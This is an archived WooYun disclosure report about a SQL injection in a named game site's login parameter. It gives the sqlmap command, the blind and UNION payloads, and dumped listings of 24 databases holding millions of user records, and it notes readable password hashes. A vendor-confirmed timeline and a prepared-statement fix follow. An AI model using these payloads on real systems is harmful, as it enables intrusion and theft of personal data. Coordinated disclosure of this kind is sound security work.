WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2016-05-27: Details sent to the vendor; awaiting vendor handling
2016-05-27: Vendor confirmed; details visible to the vendor only
2016-06-06: Details opened to core white hats and domain experts
2016-06-16: Details opened to regular white hats
2016-06-26: Details opened to intern white hats
2016-07-11: Details opened to the public
Couldn't get a shell, so sad.
There is an injection point in the game login request; it is UNION-exploitable:
http://long.gamebean.com/game_enter.php?s_id=1
Ran sqlmap against it:
sqlmap -u 'http://long.gamebean.com/game_enter.php?s_id=1' --dbs

sqlmap {1.0.4.4#dev}  http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:59:19

[09:59:19] [INFO] resuming back-end DBMS 'mysql'
[09:59:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php'. Do you want to follow? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: s_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))OztZ) AND 'RdBD'='RdBD

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: s_id=-8227' UNION ALL SELECT CONCAT(0x716a6b6a71,0x78514469644943624c58794a73766a6954436456654979657a6e6658516564716145435362735458,0x71626a7171),NULL-- -
---
[09:59:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.12
[09:59:23] [INFO] fetching database names
[09:59:23] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws
All 24 databases of the site are reachable through this one injection point.
Among them, the bbs database, the user database and the ssfee_platform (promotion platform) database hold roughly 2 million, 4.5 million and 5.6 million user records respectively (account, password, phone number, e-mail); after deduplication that is about 6 million users.
Database: bbs
| Table | Entries |
| uc_memberfields | 1980846 |
| uc_members | 1980846 |
| cdb_favoritethreads | 46470 |
| cdb_prompt | 21412 |
| cdb_memberfields | 18489 |
| cdb_members | 18488 |
| cdb_posts | 9945 |
| cdb_onlinetime | 8183 |
| cdb_threads | 3357 |
| uchome_creditlog | 1660 |
| cdb_promptmsgs | 1321 |
| uchome_pic | 1320 |
| uchome_tagblog | 1118 |
| uc_pms | 1095 |
| cdb_threadsmod | 709 |
| cdb_modworks | 666 |
| cdb_rsscaches | 651 |
| uchome_blog | 502 |
| uchome_blogfield | 502 |
| uchome_member | 483 |
| uchome_space | 483 |
| uchome_spacefield | 483 |
| uchome_album | 464 |
| uchome_feed | 425 |
| cdb_threadtags | 340 |
| uchome_spaceinfo | 320 |
| cdb_stylevars | 282 |
| uchome_stat | 245 |
| cdb_settings | 244 |
| cdb_tags | 243 |
| uchome_tag | 209 |
| uchome_friend | 126 |
| uchome_usertask | 96 |
| cdb_smilies | 80 |
| cdb_statvars | 73 |
| uc_newpm | 66 |
| cdb_typeoptions | 65 |
| uchome_notification | 65 |
| uchome_config | 64 |
| uchome_comment | 62 |
| cdb_forumfields | 55 |
| cdb_forums | 55 |
| cdb_stats | 52 |
| uchome_creditrule | 47 |
| cdb_spacecaches | 42 |
| cdb_caches | 41 |
| uc_notelist | 38 |
| cdb_faqs | 34 |
| uchome_visitor | 32 |
| cdb_request | 30 |
| uc_friends | 29 |
| cdb_debateposts | 28 |
| cdb_favorites | 28 |
| cdb_favoriteforums | 25 |
| uchome_magic | 25 |
| cdb_magiclog | 24 |
| uc_settings | 24 |
| uchome_doing | 24 |
| uchome_magicstore | 24 |
| uchome_poke | 22 |
| uchome_magicinlog | 21 |
| uchome_post | 21 |
| uchome_usermagic | 21 |
| uchome_polloption | 20 |
| uchome_thread | 20 |
| cdb_usergroups | 19 |
| cdb_failedlogins | 18 |
| uchome_share | 18 |
| cdb_moderators | 17 |
| uchome_click | 15 |
| cdb_ratelog | 14 |
| cdb_taskvars | 14 |
| cdb_crons | 12 |
| cdb_forumlinks | 12 |
| cdb_magics | 12 |
| cdb_projects | 11 |
| cdb_reportlog | 11 |
| uchome_magicuselog | 10 |
| cdb_words | 9 |
| uchome_usergroup | 9 |
| cdb_admingroups | 7 |
| cdb_polloptions | 7 |
| cdb_tasks | 7 |
| uchome_task | 7 |
| cdb_access | 6 |
| cdb_feeds | 6 |
| cdb_prompttype | 6 |
| cdb_styles | 6 |
| cdb_templates | 6 |
| uchome_eventclass | 6 |
| uchome_mtag | 6 |
| uchome_polluser | 6 |
| uchome_tagspace | 6 |
| cdb_attachments | 5 |
| cdb_navs | 5 |
| cdb_ranks | 5 |
| uchome_cron | 5 |
| cdb_admincustom | 4 |
| cdb_bbcodes | 4 |
| cdb_onlinelist | 4 |
| cdb_searchindex | 4 |
| cdb_typemodels | 4 |
| uchome_data | 4 |
| uchome_poll | 4 |
| uchome_pollfield | 4 |
| cdb_imagetypes | 3 |
| cdb_warnings | 3 |
| uc_applications | 3 |
| uchome_class | 3 |
| uchome_profield | 3 |
| uchome_report | 3 |
| uchome_statuser | 3 |
| cdb_addons | 2 |
| cdb_debates | 2 |
| cdb_polls | 2 |
| cdb_adminactions | 1 |
| cdb_adminsessions | 1 |
| cdb_attachmentfields | 1 |
| uc_admins | 1 |
| uc_failedlogins | 1 |
| uc_protectedmembers | 1 |
Database: user
| Table | Entries |
| channel_extend | 12501938 |
| members_info | 4550839 |
| members_0 | 650074 |
| members_6 | 648069 |
| members_4 | 647573 |
| members_8 | 646946 |
| members_2 | 646486 |
| members_7 | 640523 |
| members_5 | 640124 |
| members_3 | 638772 |
| members_1 | 638475 |
| members_9 | 638271 |
| members_football | 66598 |
| membersinfo_0 | 29646 |
| membersinfo_6 | 29350 |
| membersinfo_4 | 29293 |
| membersinfo_5 | 29186 |
| membersinfo_2 | 29133 |
| membersinfo_8 | 29063 |
| membersinfo_3 | 28919 |
| membersinfo_7 | 28804 |
| membersinfo_1 | 28781 |
| membersinfo_9 | 28705 |
| footballuser_copy1 | 21563 |
| members_point | 20073 |
| members_fmworlds | 5047 |
| zq_point | 2703 |
| a | 1355 |
| footballuser | 1000 |
| invite | 25 |
| partner | 11 |
Database: ssfee_platform
| Table | Entries |
| p_user_ip | 6538408 |
| user_info_201112 | 5643243 |
| user_info | 3971775 |
| p_area | 2869631 |
| advt_stat_hour_201201TO06 | 2474046 |
| user_info_201102 | 2234956 |
| register_after | 1738043 |
| advt_stat_hour | 1559224 |
| advt_stat_channel | 1082289 |
| advt_stat_hour_201101TO07 | 1069454 |
| u_ip | 376052 |
| advt_stat_hour_201101TO02 | 344281 |
| jiaose_sssg | 186520 |
| temp4 | 139504 |
| advt_stat_ye | 117002 |
| advt_stat_hour_20108TO10 | 101229 |
| p_area_Integration | 57078 |
| temp2 | 56822 |
| p_newsbase_201206 | 49845 |
| p_ip | 45309 |
| advt_stat_nq | 43122 |
| p_area_Integration_ip | 25881 |
| seek_gateway_fee | 24020 |
| p_area_register | 21292 |
| seek_gateway_fee_bak | 19978 |
| wapgame_zhuce | 19034 |
| jiaose_long | 16060 |
| user_info_mj | 11834 |
| sms_fee | 7404 |
| temp3 | 4679 |
| get_user | 4035 |
| wapgame_fee | 3921 |
| wapgame_fee_bak | 3626 |
| p_newsbase_tmp | 3421 |
| pc_jiaose | 3134 |
| user_stat | 2809 |
| p_ad_info | 2590 |
| seek_gateway_chengben | 2381 |
| seek_gateway_chengben_bak | 2368 |
| p_user_ip_copy | 2355 |
| wapgame_fee_201109 | 2355 |
| sms_fee1 | 1772 |
| jiaose_yan | 1096 |
| p_newscontent | 966 |
| wapgame_zhuce_tmp | 927 |
| p_ad | 895 |
| p_area_Integration_copy | 742 |
| lm_info | 704 |
| p_newsbase | 665 |
| haoduan_ds | 345 |
| bd | 295 |
| bd2 | 295 |
| lm_info_test | 288 |
| netgame_stat | 243 |
| temp | 216 |
| seek_gateway_fee_tmp1 | 154 |
| p_area_Integration_ip_copy2 | 132 |
| p_area_Integration_ip_copy1 | 118 |
| p_area_Integration_ip_ddd | 118 |
| p_area_Integration_test_copy1 | 116 |
| baidu | 112 |
| wapgame_fee_tmp | 101 |
| p_user_ip_are | 99 |
| seek_gateway_fee_g9 | 92 |
| kuapintai_fee | 91 |
| jiaose_ly | 70 |
| u_manage | 68 |
| advt_stat_tmp | 62 |
| seek_gateway_fee_tmp | 62 |
| seek_gateway_fee_lr | 60 |
| u_admin | 60 |
| netgame_stat_tmp | 49 |
| sms_fee2 | 48 |
| p_area_Integration_ip_copy | 36 |
| sms_fee3 | 24 |
| seek_gateway_chengben_lr | 17 |
| u_group | 15 |
| seek_gateway_chengben_tmp | 14 |
| wapgame_fee_bf2015 | 12 |
| p_user_ip_tmp | 10 |
| data_manage | 9 |
| p_newsclass | 9 |
| wapgame_qudao | 9 |
| p_admin | 6 |
| p_area_Integration_test_copy | 6 |
| seek_gateway_xz | 6 |
| data_admin | 4 |
| jiaose_djh | 4 |
| yuan | 4 |
| data_group | 2 |
| p_adver_admin | 2 |
| ios_xml | 1 |
| p_config | 1 |
It also exposes the Discuz! UCenter keys (the authkey column of bbs.uc_applications, 3 entries).
Couldn't get a shell. The database password hashes (mysql.user, 39 entries) are readable as well.
Couldn't find the server IP, so still no shell. Sigh.
Filter SQL input.
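As an added illustration of that fix (not code from the site; game_enter.php itself is not public): the string-concatenation pattern that the sqlmap payloads imply, beside a mysqli prepared-statement version that keeps s_id out of the SQL text. The table game_server, its columns, the function names and the grant at the end are assumptions.

```php
<?php
// Added example, not the site's own code. Reconstructs the vulnerable
// pattern the sqlmap output implies (s_id spliced into a quoted literal,
// which is why s_id=1' AND ... and s_id=-8227' UNION ... both work) and
// a parameterized replacement. Table and column names are assumptions.

// Vulnerable pattern: the closing quote in the request ends the literal,
// so the rest of the parameter is parsed as SQL (UNION, SLEEP, ...).
function lookup_game_vulnerable(mysqli $db, $s_id) {
    $sql = "SELECT name, enter_url FROM game_server WHERE s_id = '" . $s_id . "'";
    return $db->query($sql);
}

// Hardened: s_id is a numeric id in every legitimate request, so reject
// anything else, then bind the value; it never becomes part of the SQL text.
function lookup_game_safe(mysqli $db, $s_id) {
    if (!ctype_digit((string) $s_id)) {
        return null;                     // non-numeric id: refuse, log upstream
    }
    $id = (int) $s_id;
    $stmt = $db->prepare('SELECT name, enter_url FROM game_server WHERE s_id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($name, $url);
    $row = $stmt->fetch() ? array('name' => $name, 'enter_url' => $url) : null;
    $stmt->close();
    return $row;
}

// Second layer: one injection point reached all 24 schemas, so the web
// application's MySQL account had far more privilege than the login page
// needs. Scope it to the game schema only (assumed account/host names):
//   GRANT SELECT ON gs.* TO 'game_web'@'<web-host>';
//   REVOKE ALL PRIVILEGES ON *.* FROM 'game_web'@'<web-host>';
```

With the account scoped this way, the same injection would no longer be able to read bbs, user, ssfee_platform or mysql.user even before the query is fixed.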
Severity: High
Vulnerability Rank: 11
Confirmed: 2016-05-27 14:58
Thank you for the feedback on 欢畅游戏's security issue.
None yet.